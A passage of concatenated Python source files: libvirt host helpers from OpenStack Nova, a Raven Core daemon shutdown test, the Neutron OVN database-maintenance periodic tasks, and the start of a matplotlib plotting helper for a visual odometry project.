xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("pci", flags=flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
@property
def has_hyperthreading(self):
"""Determine if host CPU has SMT, a.k.a. HyperThreading.
:return: True if the host has SMT enabled, else False.
"""
if self._has_hyperthreading is not None:
return self._has_hyperthreading
self._has_hyperthreading = False
# we don't use '/capabilities/host/cpu/topology' since libvirt doesn't
# guarantee the accuracy of this information
for cell in self.get_capabilities().host.topology.cells:
if any(len(cpu.siblings) > 1 for cpu in cell.cpus if cpu.siblings):
self._has_hyperthreading = True
break
return self._has_hyperthreading
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test ravend shutdown."""
from threading import Thread
from test_framework.test_framework import RavenTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(RavenTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
maintenance.py | # Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import segment as segment_def
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.db import segments_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
def rerun_on_schema_updates(func):
"""Tasks decorated with this will rerun upon database version updates."""
func._rerun_on_schema_updates = True
return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
"""Event listening to reconnections from OVN Northbound DB."""
def __init__(self, driver, version):
self.driver = driver
self.version = version
table = 'Connection'
events = (self.ROW_CREATE,)
super(OVNNBDBReconnectionEvent, self).__init__(events, table, None)
self.event_name = self.__class__.__name__
def run(self, event, row, old):
curr_version = self.driver.get_ovn_nbdb_version()
if self.version != curr_version:
self.driver.nbdb_schema_updated_hook()
self.version = curr_version
class SchemaAwarePeriodicsBase(object):
def __init__(self, ovn_client):
self._nb_idl = ovn_client._nb_idl
self._set_schema_aware_periodics()
self._nb_idl.idl.notify_handler.watch_event(OVNNBDBReconnectionEvent(
self, self.get_ovn_nbdb_version()))
def get_ovn_nbdb_version(self):
return self._nb_idl.idl._db.version
def _set_schema_aware_periodics(self):
self._schema_aware_periodics = []
for name, member in inspect.getmembers(self):
if not inspect.ismethod(member):
continue
schema_upt = getattr(member, '_rerun_on_schema_updates', None)
if schema_upt and periodics.is_periodic(member):
LOG.debug('Schema aware periodic task found: '
'%(owner)s.%(member)s',
{'owner': self.__class__.__name__, 'member': name})
self._schema_aware_periodics.append(member)
@abc.abstractmethod
def nbdb_schema_updated_hook(self):
"""Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._sb_idl = self._ovn_client._sb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip_in_nat_or_lb,
'ovn_create': self._create_floatingip_and_pf,
'ovn_update': self._update_floatingip_and_pf,
'ovn_delete': self._delete_floatingip_and_pf,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._nb_idl.get_port_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
@property
def has_lock(self):
return not self._idl.is_lock_contended
def nbdb_schema_updated_hook(self):
if not self.has_lock:
return
for func in self._schema_aware_periodics:
LOG.debug('OVN Northbound DB schema version was updated,'
'invoking "%s"', func.__name__)
try:
func()
except periodics.NeverAgain:
pass
except Exception:
LOG.exception(
'Unknown error while executing "%s"', func.__name__)
def _fix_create_update(self, context, row):
res_map = self._resources_func_map[row.resource_type]
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](context, n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
# If the resource exist in the OVN DB but the revision
# number is different from Neutron DB, updated it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](context, n_obj)
else:
# If the resource exist and the revision number
# is equal on both databases just bump the revision on
# the cache table.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
def _fix_delete(self, context, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
revision_numbers_db.delete_revision(
context, row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](context, row.resource_uuid)
def _fix_create_update_subnet(self, context, row):
# Get the lasted version of the port in Neutron DB
sn_db_obj = self._ovn_client._plugin.get_subnet(
context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
# TODO(jlibosva): Remove the migration to port groups at some point. It's
# been around since Queens release so it is good to drop this soon.
@periodics.periodic(spacing=10, run_immediately=True)
@rerun_on_schema_updates
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if not self._nb_idl.get_address_sets():
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
delete_inconsistencies):
if not CONF.debug:
return
def _log(inconsistencies, type_):
if not inconsistencies:
return
c = {}
for f in inconsistencies:
if f.resource_type not in c:
c[f.resource_type] = 1
else:
c[f.resource_type] += 1
fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
LOG.debug('Maintenance task: Number of inconsistencies '
'found at %(type_)s: %(fail_str)s',
{'type_': type_, 'fail_str': fail_str})
_log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
_log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
create_update_inconsistencies = (
revision_numbers_db.get_inconsistent_resources(admin_context))
delete_inconsistencies = (
revision_numbers_db.get_deleted_resources(admin_context))
if not any([create_update_inconsistencies, delete_inconsistencies]):
LOG.debug('Maintenance task: No inconsistencies found. Skipping')
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._log_maintenance_inconsistencies(create_update_inconsistencies,
delete_inconsistencies)
self._sync_timer.restart()
dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
'(type: %(res_type)s) at %(type_)s')
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
try:
# NOTE(lucasagomes): The way to fix subnets is bit
# different than other resources. A subnet in OVN language
# is just a DHCP rule but, this rule only exist if the
# subnet in Neutron has the "enable_dhcp" attribute set
# to True. So, it's possible to have a consistent subnet
# resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(admin_context, row)
else:
self._fix_create_update(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix resource '
'%(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_DELETE})
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(admin_context,
row.resource_uuid)
else:
self._fix_delete(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix deleted '
'resource %(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task: Synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, context, port):
router_id = port['device_id']
iface_info = self._ovn_client._l3_plugin._add_neutron_router_interface(
context, router_id, {'port_id': port['id']}, may_exist=True)
self._ovn_client.create_router_port(context, router_id, iface_info)
def _check_subnet_global_dhcp_opts(self):
inconsistent_subnets = []
admin_context = n_context.get_admin_context()
subnet_filter = {'enable_dhcp': [True]}
neutron_subnets = self._ovn_client._plugin.get_subnets(
admin_context, subnet_filter)
global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
LOG.debug('Checking %s subnets for global DHCP option consistency',
len(neutron_subnets))
for subnet in neutron_subnets:
ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
subnet['id'])['subnet']
inconsistent_opts = []
if ovn_dhcp_opts:
if subnet['ip_version'] == n_const.IP_VERSION_4:
for opt, value in global_v4_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if subnet['ip_version'] == n_const.IP_VERSION_6:
for opt, value in global_v6_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if inconsistent_opts:
LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
subnet['id'], inconsistent_opts)
inconsistent_subnets.append(subnet)
return inconsistent_subnets
def _create_floatingip_and_pf(self, context, floatingip):
self._ovn_client.create_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_create(
context, floatingip)
def _update_floatingip_and_pf(self, context, floatingip):
self._ovn_client.update_floatingip(context, floatingip)
self._ovn_client._l3_plugin.port_forwarding.maintenance_update(
context, floatingip)
def _delete_floatingip_and_pf(self, context, fip_id):
self._ovn_client._l3_plugin.port_forwarding.maintenance_delete(
context, fip_id)
self._ovn_client.delete_floatingip(context, fip_id)
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600,
run_immediately=True)
def check_global_dhcp_opts(self):
# This periodic task is included in DBInconsistenciesPeriodics since
# it uses the lock to ensure only one worker is executing
if not self.has_lock:
return
if (not ovn_conf.get_global_dhcpv4_opts() and
not ovn_conf.get_global_dhcpv6_opts()):
# No need to scan the subnets if the settings are unset.
raise periodics.NeverAgain()
LOG.debug('Maintenance task: Checking DHCP options on subnets')
self._sync_timer.restart()
fix_subnets = self._check_subnet_global_dhcp_opts()
if fix_subnets:
admin_context = n_context.get_admin_context()
LOG.debug('Triggering update for %s subnets', len(fix_subnets))
for subnet in fix_subnets:
neutron_net = self._ovn_client._plugin.get_network(
admin_context, subnet['network_id'])
try:
self._ovn_client.update_subnet(admin_context, subnet,
neutron_net)
except Exception:
LOG.exception('Failed to update subnet %s',
subnet['id'])
self._sync_timer.stop()
LOG.info('Maintenance task: DHCP options check finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=1800, run_immediately=True)
def check_metadata_ports(self):
# If OVN metadata is disabled do not run this task again
if not ovn_conf.is_ovn_metadata_enabled():
raise periodics.NeverAgain()
# Make sure that only one worker is executing this
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
for n in self._ovn_client._plugin.get_networks(admin_context):
self._ovn_client.create_metadata_port(admin_context, n)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the U cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_port_security_unknown_address(self):
if not self.has_lock:
return
for port in self._nb_idl.lsp_list().execute(check_error=True):
if port.type == ovn_const.LSP_TYPE_LOCALNET:
continue
addresses = port.addresses
type_ = port.type.strip()
if not port.port_security:
if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
addresses.append(ovn_const.UNKNOWN_ADDR)
elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
else:
if type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
if addresses:
self._nb_idl.lsp_set_addresses(
port.name, addresses=addresses).execute(check_error=True)
else:
self._nb_idl.db_clear(
'Logical_Switch_Port', port.name,
'addresses').execute(check_error=True)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_fragmentation_support(self):
if not self.has_lock:
return
context = n_context.get_admin_context()
for net in self._ovn_client._plugin.get_networks(
context, {external_net.EXTERNAL: [True]}):
self._ovn_client.set_gateway_mtu(context, net)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_igmp_snoop_support(self):
if not self.has_lock:
return
with self._nb_idl.transaction(check_error=True) as txn:
value = ('true' if ovn_conf.is_igmp_snooping_enabled()
else 'false')
for ls in self._nb_idl.ls_list().execute(check_error=True):
if (ls.other_config.get(ovn_const.MCAST_SNOOP,
None) == value or not ls.name):
continue
txn.add(self._nb_idl.db_set(
'Logical_Switch', ls.name,
('other_config', {
ovn_const.MCAST_SNOOP: value,
ovn_const.MCAST_FLOOD_UNREGISTERED: 'false'})))
raise periodics.NeverAgain()
def _delete_default_ha_chassis_group(self, txn):
# TODO(lucasgomes): Remove the deletion of the
# HA_CHASSIS_GROUP_DEFAULT_NAME in the Y cycle. We no longer
# have a default HA Chassis Group.
cmd = [self._nb_idl.ha_chassis_group_del(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, if_exists=True)]
self._ovn_client._transaction(cmd, txn=txn)
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_ha_chassis_group(self):
# If external ports is not supported stop running
# this periodic task
if not self._ovn_client.is_external_ports_supported():
raise periodics.NeverAgain()
if not self.has_lock:
return
external_ports = self._nb_idl.db_find_rows(
'Logical_Switch_Port', ('type', '=', ovn_const.LSP_TYPE_EXTERNAL)
).execute(check_error=True)
context = n_context.get_admin_context()
with self._nb_idl.transaction(check_error=True) as txn:
for port in external_ports:
network_id = port.external_ids[
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY].replace(
ovn_const.OVN_NAME_PREFIX, '')
ha_ch_grp = self._ovn_client.sync_ha_chassis_group(
context, network_id, txn)
try:
port_ha_ch_uuid = port.ha_chassis_group[0].uuid
except IndexError:
port_ha_ch_uuid = None
if port_ha_ch_uuid != ha_ch_grp:
txn.add(self._nb_idl.set_lswitch_port(
port.name, ha_chassis_group=ha_ch_grp))
self._delete_default_ha_chassis_group(txn)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_localnet_legacy_port_name(self):
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
cmds = []
for ls in self._nb_idl.ls_list().execute(check_error=True):
network_id = ls.name.replace('neutron-', '')
legacy_name = utils.ovn_provnet_port_name(network_id)
legacy_port = None
segment_id = None
for lsp in ls.ports:
if legacy_name == lsp.name:
legacy_port = lsp
break
else:
continue
for segment in segments_db.get_network_segments(
admin_context, network_id):
if (segment.get(segment_def.PHYSICAL_NETWORK) ==
legacy_port.options['network_name']):
segment_id = segment['id']
break
if not segment_id:
continue
new_p_name = utils.ovn_provnet_port_name(segment_id)
cmds.append(self._nb_idl.db_set('Logical_Switch_Port',
legacy_port.uuid,
('name', new_p_name)))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the Y cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_mcast_flood_reports(self):
if not self.has_lock:
return
cmds = []
for port in self._nb_idl.lsp_list().execute(check_error=True):
port_type = port.type.strip()
if port_type in ("vtep", ovn_const.LSP_TYPE_LOCALPORT, "router"):
continue
options = port.options
if ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS in options:
continue
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS: 'true'})
if port_type == ovn_const.LSP_TYPE_LOCALNET:
options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD: 'false'})
cmds.append(self._nb_idl.lsp_set_options(port.name, **options))
if cmds:
with self._nb_idl.transaction(check_error=True) as txn:
for cmd in cmds:
txn.add(cmd)
raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
def __init__(self, group):
self._group = group
self.ctx = n_context.get_admin_context()
@periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
def touch_hash_ring_nodes(self):
# NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
# here because we want the maintenance tasks from each instance to
# execute this task.
hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
mplot_thread.py | """
Project: Visual Odometry
Name : Heru-05 | M09158023
Date
"""
import time
import sys
import numpy as np
import platform
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import multiprocessing as mp
from multiprocessing import Process, Queue, Lock, RLock, Value
import ctypes
kPlotSleep = 0.04
kVerbose = False
kSetDaemon = True # from https://docs.python.org/3/library/threading.html#threading.Thread.daemon
# The entire Python program exits when no alive non-daemon threads are left.
kUseFigCanvasDrawIdle = True
# global lock for drawing with matplotlib
mp_lock = RLock()
if kUseFigCanvasDrawIdle:
plt.ion()
# use mplotlib figure to draw in 2d dynamic data
class Mplot2d:
def __init__(self, xlabel='', ylabel='', title=''):
self.xlabel = xlabel
self.ylabel = ylabel
self.title = title
self.data = None
self.got_data = False
self.axis_computed = False
self.xlim = [float("inf"),float("-inf")]
self.ylim = [float("inf"),float("-inf")]
self.key = Value('i',0)
self.is_running = Value('i',1)
self.handle_map = {}
self.queue = Queue()
self.vp = Process(target=self.drawer_thread, args=(self.queue,mp_lock,self.key,self.is_running,))
self.vp.daemon = kSetDaemon
self.vp.start()
def quit(self):
self.is_running.value = 0
self.vp.join(timeout=5)
def drawer_thread(self, queue, lock, key, is_running):
self.init(lock)
#print('starting drawer_thread')
while is_running.value == 1:
#print('drawer_refresh step')
self.drawer_refresh(queue, lock)
if kUseFigCanvasDrawIdle:
time.sleep(kPlotSleep)
print(mp.current_process().name,'closing fig ', self.fig)
plt.close(self.fig)
def drawer_refresh(self, queue, lock):
while not queue.empty():
self.got_data = True
self.data = queue.get()
xy_signal, name, color, marker = self.data
#print(mp.current_process().name,"refreshing : signal ", name)
if name in self.handle_map:
handle = self.handle_map[name]
handle.set_xdata(np.append(handle.get_xdata(), xy_signal[0]))
handle.set_ydata(np.append(handle.get_ydata(), xy_signal[1]))
else:
handle, = self.ax.plot(xy_signal[0], xy_signal[1], c=color, marker=marker, label=name)
self.handle_map[name] = handle
#print(mp.current_process().name,"got data: ", self.got_data)
if self.got_data is True:
self.plot_refresh(lock)
def on_key_press(self, event):
#print(mp.current_process().name,"key event pressed...", self._key)
self.key.value = ord(event.key) # conver to int
def on_key_release(self, event):
#print(mp.current_process().name,"key event released...", self._key)
self.key.value = 0 # reset to no key symbol
def get_key(self):
return chr(self.key.value)
def init(self, lock):
lock.acquire()
if kVerbose:
print(mp.current_process().name,"initializing...")
self.fig = plt.figure()
if kUseFigCanvasDrawIdle:
self.fig.canvas.draw_idle()
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
#self.ax = self.fig.gca(projection='3d')
#self.ax = self.fig.gca()
self.ax = self.fig.add_subplot(111)
if self.title is not '':
self.ax.set_title(self.title)
self.ax.set_xlabel(self.xlabel)
self.ax.set_ylabel(self.ylabel)
self.ax.grid()
#Autoscale on unknown axis and known lims on the other
self.ax.set_autoscaley_on(True)
#self.refresh()
lock.release()
def setAxis(self):
self.ax.legend()
self.ax.relim()
self.ax.autoscale_view()
#We need to draw *and* flush
if not kUseFigCanvasDrawIdle:
self.fig.canvas.draw()
self.fig.canvas.flush_events()
def draw(self, xy_signal, name, color='r', marker='.'):
if self.queue is None:
return
self.queue.put((xy_signal, name, color, marker))
def updateMinMax(self, np_signal):
xmax,ymax = np.amax(np_signal,axis=0)
xmin,ymin = np.amin(np_signal,axis=0)
cx = 0.5*(xmax+xmin)
cy = 0.5*(ymax+ymin)
if False:
# update maxs
if xmax > self.xlim[1]:
self.xlim[1] = xmax
if ymax > self.ylim[1]:
self.ylim[1] = ymax
# update mins
if xmin < self.xlim[0]:
self.xlim[0] = xmin
if ymin < self.ylim[0]:
self.ylim[0] = ymin
# make axis actually squared
if True:
smin = min(xmin,ymin)
smax = max(xmax,ymax)
delta = 0.5*(smax - smin)
self.xlim = [cx-delta,cx+delta]
self.ylim = [cy-delta,cy+delta]
self.axis_computed = True
def plot_refresh(self, lock):
if kVerbose:
print(mp.current_process().name,"refreshing ", self.title)
lock.acquire()
self.setAxis()
if not kUseFigCanvasDrawIdle:
plt.pause(kPlotSleep)
lock.release()
# fake
def refresh(self):
pass
# use mplotlib figure to draw in 3D trajectories
class Mplot3d:
def __init__(self, title=''):
